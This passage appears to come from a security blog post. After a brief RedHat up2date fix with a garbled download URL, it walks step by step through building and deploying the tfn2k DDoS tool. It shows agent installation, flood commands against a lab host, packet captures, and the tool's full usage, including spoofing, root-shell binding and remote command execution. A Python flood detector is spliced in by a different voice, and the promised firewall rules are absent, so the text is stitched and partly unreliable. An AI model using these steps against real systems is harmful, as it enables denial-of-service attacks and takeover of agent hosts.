🦑 in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :



1) First download the following files into the same directory
* up2date-3.1.23.2-1.i386.rpm, MD5 checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm, MD5 checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm

2) Check the MD5 checksums
[user@localhost user]$ md5sum 'filename'

3) [user@localhost user]$ su
Password: (enter the root password)

4) [root@localhost user]# rpm -Fvh up2date-*

5) [root@localhost user]# up2date -p

If the connection is refused at step 5, it is because RHN requires you to reactivate your account. Go to https://rhn.redhat.com/renew/, enter your username and answer the questions to activate your account.
Other versions are handled the same way.


🦑 Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Denial of service (DoS) can refer to any event that stops a service from being provided normally, for example a software bug or an operator error. However, DoS caused by mistakes is rare; most cases are deliberate attacks. Denial of service has now evolved into distributed denial of service (DDoS), which uses many agents to concentrate on one target and is far more harmful.

> We all know that TCP/IP has become the underlying protocol framework of the whole Internet. It is fair to say that without TCP/IP the Internet would at least not be as popular as it is now, and might not exist at all. But everything has two sides: TCP/IP benefits all of us, and because of problems in the protocol itself it also becomes a tool for others to attack us. We will use the TCP three-way handshake that establishes a connection to illustrate.

🦑 First, the TCP SYN flood
  

1) The client sends a TCP packet with the SYN (synchronize) flag to the server. This packet carries basic information such as the client port and the TCP sequence number.

2) After the server receives the SYN packet, it replies with a SYN-ACK packet to confirm.

3) After receiving the server's SYN-ACK, the client sends an ACK back to the server. Once the server receives this packet the TCP connection is established and the two sides can communicate (it feels like a wedding: first bow to heaven and earth, second bow to the parents ... and into the bridal chamber ... haha).

> The problem lies in step 3. If the server does not receive the client's ACK, it waits; this state is called half-open (semi-connected), and it is held for a certain time (the exact time varies between operating systems). If the SYN requests exceed what the server can hold and the backlog queue fills up, the server no longer accepts new requests, and connections from other legitimate users are refused. This kind of attack is often called a half-open connection attack, and it is extremely lethal.
🦑 Of course, there are various DoS attack methods, such as UDP flood, ICMP/Ping, ICMP/SMURF ...; the specific principles are introduced at http://www.chinaitlab.com/www/special/ciwddos.asp, which has very detailed explanations of the principles and of commonly used attack software. When it comes to DoS attack software, the most representative is tfn2k (Tribe Flood Network 2000), whose author is the famous mixter from Germany (home page http://mixter.void.ru/papers.html); it seems he is now working on something called tfn3k, hey, I don't know how many more people will lose sleep and appetite over it.

🦑 Second, the tfn2k attack principle

  1) tfn2k attack system.

  tfn2k should be regarded as a masterpiece among DDoS tools; its functions are astounding ... (my awe of it flows like a river, on and on ...) Let's look at its architecture.

  Master --- runs the tfn client, remotely controls the agents, and specifies the attack targets and the attack method. (The sinister villain)

  Agent --- a victim host that has been implanted with and is running the td process; it accepts commands from tfn and carries out the attack. Note that an attacker usually controls many agents to complete the attack, and the agent systems are mostly Unix, Linux, etc. (Poor victim)

  Target host --- the host or network attacked by the DDoS: Yahoo, Amazon, CNN, eBay, etc. (the biggest victim, as depressed as I am)

 2) tfn2k features.

  ◆ The master sends commands to the agent host over TCP, UDP, ICMP or a random choice among them (random by default). The attack methods include TCP/SYN, UDP, ICMP/PING, mixed attacks, TARGA3, etc.

  ◆ Communication between master and agent is one-way: the master only sends commands to the agent, using random header information and even forged source addresses, and the agent never sends anything back to the master.

  ◆ All commands are encrypted with the CAST-256 algorithm, using a password entered at compile time as the key; that password is the only authentication credential.

  ◆ Through the td process, the master can execute remote shell commands.

  ◆ The name of the td process can be changed at compile time, which makes it easier to hide.

  ◆ tfn can be compiled and run on win32 and Linux systems

  ...

  Spoofing of the source IP address is a basic feature, and compared with the old version of tfn it sends packets more efficiently. In my own test, in less than 5 minutes, two agent machines paralyzed my redhat linux 9.0 system.

🦑 Third, the tfn2k actual test

  1) Test environment:

   Software: redhat linux 9.0
   Hardware platform:
     master:
        IP: 192.168.0.6
        PIV 2.4 / 256*2 / rtl8139
     ag1:
        IP: 192.168.0.2
        PIV 2.4 / 256* / rtl8139
     ag2:
        IP: 192.168.0.3
        PIV 2.6 / 512*2 / 3c905
     aim (target):
        IP: 192.168.0.5
        PIV 2.66c / 512*2 / 3c905
     switch: D-Link DES 1024R

  1) Download tfn2k.tgz (because this software is unusual, I don't provide a download address; if you are interested, find it online)

  2) Unpack it: tar zxvf tfn2k.tgz

  3) Modify the files

  A. src/Makefile: if your system is Linux, nothing needs to be changed. If it is a win32 system, comment out these lines:


      # Linux / *BSD* / Others
      CC = gcc
      CFLAGS = -Wall -O3
      CLIBS =

  and uncomment these lines:


      # Win32 (cygwin)
      #CC = gcc
      #CFLAGS = -Wall -DWINDOZE -O2
      #CLIBS =

  Because my test system is redhat linux 9.0, I made no changes.

  B. src/config.h: the defaults are usable. If you are interested, adjust it according to the comments in the file.

  C. src/ip.h: make one change here, otherwise compilation fails with a duplicate definition error.


     /* struct in_addr
      {
       unsigned long int s_addr;
     }; */

  Note ~ I put it between "/* */", i.e. commented it out :)

  D) Change the compiler:

  The compiler tfn2k supports is egcs-1.1.2-30, while redhat linux 9.0 ships gcc-3.2.2-5, so tfn2k will not compile unless you replace gcc. Note that after the change, software that depends on gcc 3.2.2 will no longer compile, so be careful.

  The method is very simple: find a redhat linux 6.2 installation disc and copy egcs-1.1.2-30.rpm and cpp-1.1.2-30.rpm to ~/


    cd /mnt/cdrom/Redhat/RPMS
    cp egcs-1.1.2-30* cpp-1.1.2-30* ~/

  Install cpp: rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm

  Install egcs: rpm -Uvh egcs-1.1.2-30.i386.rpm

  (if errors are reported, use --nodeps, --oldpackage, --ignoreos and similar options to skip past them)

  4) Compile tfn2k


    cd tfn2k/src
    make

  It first shows a disclaimer that you must accept, and then you are prompted for an 8-32 character password; as mentioned earlier, this is the only authentication credential and it is compiled into the td process, so be sure to remember it ~.

  After compiling, td and tfn are generated. This is the famous tfn2k ~: td is the daemon installed on the agents, and tfn is the control end.

  5) Install td.

  Upload td to my two agents, ag1 (192.168.0.2) and ag2 (192.168.0.3). Because I'm just testing, I use a legitimate root account to upload and run the td process. If you really wanted to find and install an agent you would have to pray to God, because no administrator will say "come on baby, I will give you root, install td and make me an agent".


   [root@test /]# ftp 192.168.0.2
      Connected to 192.168.0.2.
      530 Please login with USER and PASS.
      530 Please login with USER and PASS.
      Name (192.168.0.2:root): wjpfjy
      331 Please specify the password.
      Password:
      230 Login successful. Have fun.
      Remote system type is UNIX.
      Using binary mode to transfer files.
    ftp> put td (upload td)
     local: td remote: td
     227 Entering Passive Mode (192,168,0,3,198,225)
     553 Could not create file.
    ftp> bye (quit ftp)
     221 Goodbye.

   [root@test /]# ssh 192.168.0.2
// Log in to ag1 to execute td; note that I use the root account so that I have sufficient permissions to run it.
       root@192.168.0.2's password:
       Last login: Tue Feb 24 06:51:13 2004
   [root@ag1 /]# find / -name td -print
// Find the td file just uploaded.
   [root@ag1 wjpfjy]# chmod a+x td
// Make it executable.
   [root@ag1 wjpfjy]# ./td
// Run td; now you have an agent, and it only takes commands from you :(.

  

  Use the same method to install and run the TFN2k process td on ag2 (192.168.0.3).   

  6) The attack begins (the tragic memory is being replayed ...)

  Return to the master (192.168.0.6) and prepare for the exercise ...


   [root@master root]# touch host.txt
// Set up an agent list file (if you are bored enough you may end up with many zombie
// agents; write them down so you don't forget them.)
  [root@master root]# echo "192.168.0.2" > host.txt     Add ag1, which is already running td, to host.txt.
  [root@master root]# echo "192.168.0.3" >> host.txt    Add ag2 to host.txt.

  First, let's test the link:

  [root@master root]# ./tfn -f host.txt -c 10 -i "mkdir wjpfjy"    Communicate with the agents in host.txt and have them execute the command mkdir wjpfjy to create a directory.


   Protocol: random
    Source IP: random
    Client input: list
    Command: execute remote command

    Password verification:
// Here you are prompted for the password entered at compile time. If you get it wrong, you cannot communicate with the td process.

    Sending out packets: ..

  Go to ag1 and ag2 and check whether a directory named wjpfjy was created. Normally it will be in the same directory as td; if you are not sure, use find / -name wjpfjy -print to locate it.

  [root@master root]# ./tfn -f host.txt -c 6 -i 192.168.0.5    Start the ICMP/PING attack against aim ... (Poor P4 of mine: in less than 5 minutes it was as slow as a 386.) But before it went down it still managed to record some of the attack data, a drop in the ocean. This is the tcpdump packet capture record.
[root@aim root]# tcpdump -r pack.atta -c 4 -xX
08:03:36.524907 23.43.171.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......

 

  [root@master root]# ./tfn -f host.txt -c 0    Stop the attack


    Protocol: random
    Source IP: random
    Client input: list
    Command: stop flooding

Password verification:

Sending out packets: ...

  Of course, there are other attack methods. You can change the attack method by using -c X.


  [root@master root]# ./tfn
   usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
        Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host/ip] Specify your source IP. Randomly spoofed by default, you need
        to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options/targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<-c command ID> 0 - Halt all current floods on server(s) immediately
        1 - Change IP antispoof-level (evade rfc2267 filtering)
          usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
        2 - Change Packet size, usage: -i
        3 - Bind root shell to a port, usage: -i
        4 - UDP flood, usage: -i victim@victim2@victim3@...
        5 - TCP/SYN flood, usage: -i victim@... [-p destination port]
        6 - ICMP/PING flood, usage: -i victim@...
        7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
        8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
        9 - TARGA3 flood (IP stack penetration), usage: -i victim@...
        10 - Execute remote shell command blindly, usage: -i

🦑 Fourth, the defensive approach

  Like every DDoS article on the internet says, DDoS is hard to detect. I tried to filter out all ICMP packets with a firewall to protect my host, but what I found was that my host still crashed later. Hey, don't expect me to guard against DDoS; if I could, I wouldn't need to sleep :(

  Still, the old saying: what we can do is try our best not to let our hosts become agents for other people's attacks, and to strictly restrict the traffic leaving our intranet, so as not to harm others. If everyone does this, our network environment can be safer, and at least I can sleep peacefully for a few days.
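The detection side of the capture shown above, as an added example that is neither the author's firewall nor code from the post: a Python detector that reads tcpdump summary lines like the ones recorded on aim and flags a destination receiving many echo requests from many distinct sources within a short window, also counting the `[ttl 0]` artifact of tfn2k's randomized headers. The `SAMPLE` lines are constructed (the first four mirror the capture above, the rest are made up), and `parse`/`detect` are names I chose.

```python
import re
from collections import defaultdict

# Old-style tcpdump summary line, as in the capture above (hex dump lines do not match and are skipped).
ECHO_REQ = re.compile(r"^(\d\d):(\d\d):(\d\d\.\d+) (\S+) > (\S+): icmp: echo request(?P<ttl0> \[ttl 0\])?")

# Constructed sample: the first four lines mirror the capture above, the rest are made up.
SAMPLE = """\
08:03:36.524907 23.43.171.0 > 192.168.0.5: icmp: echo request [ttl 0]
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply
08:03:36.525102 201.9.55.0 > 192.168.0.5: icmp: echo request [ttl 0]
08:03:36.525140 77.140.2.0 > 192.168.0.5: icmp: echo request [ttl 0]
08:03:36.525201 10.3.77.0 > 192.168.0.5: icmp: echo request [ttl 0]
08:03:40.100000 192.168.0.6 > 192.168.0.2: icmp: echo request
"""


def parse(lines):
    """Yield (seconds, src, dst, ttl_is_zero) for every echo-request line."""
    for line in lines:
        m = ECHO_REQ.match(line.strip())
        if m:
            h, mi, s, src, dst = m.group(1, 2, 3, 4, 5)
            yield int(h) * 3600 + int(mi) * 60 + float(s), src, dst, m.group("ttl0") is not None


def detect(lines, window_s=1.0, min_requests=5, min_sources=3):
    """Flag each destination that gets min_requests echo requests from at least min_sources distinct
    sources inside one window_s-second window (many sources = spoofed flood, not one chatty host)."""
    by_dst = defaultdict(list)
    for t, src, dst, ttl0 in parse(lines):
        by_dst[dst].append((t, src, ttl0))
    alerts = {}
    for dst, events in by_dst.items():
        events.sort()
        start = 0
        for end, (t, _, _) in enumerate(events):
            while events[start][0] < t - window_s:     # slide the window forward
                start += 1
            window = events[start:end + 1]
            sources = {s for _, s, _ in window}
            if len(window) >= min_requests and len(sources) >= min_sources:
                alerts[dst] = {"requests": len(window), "sources": len(sources),
                               "ttl0": sum(1 for _, _, z in window if z),   # tfn2k-style forged headers
                               "first_seen": events[start][0]}
                break   # report the first window that trips the threshold
    return alerts
```

On the sample, `detect(SAMPLE.splitlines())` reports only 192.168.0.5 (five requests from five sources, all with TTL 0), while the single ordinary ping to 192.168.0.2 is left alone.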

  Attached is part of my firewall. It is mainly aimed at ICMP/PING, but it is not very useful :(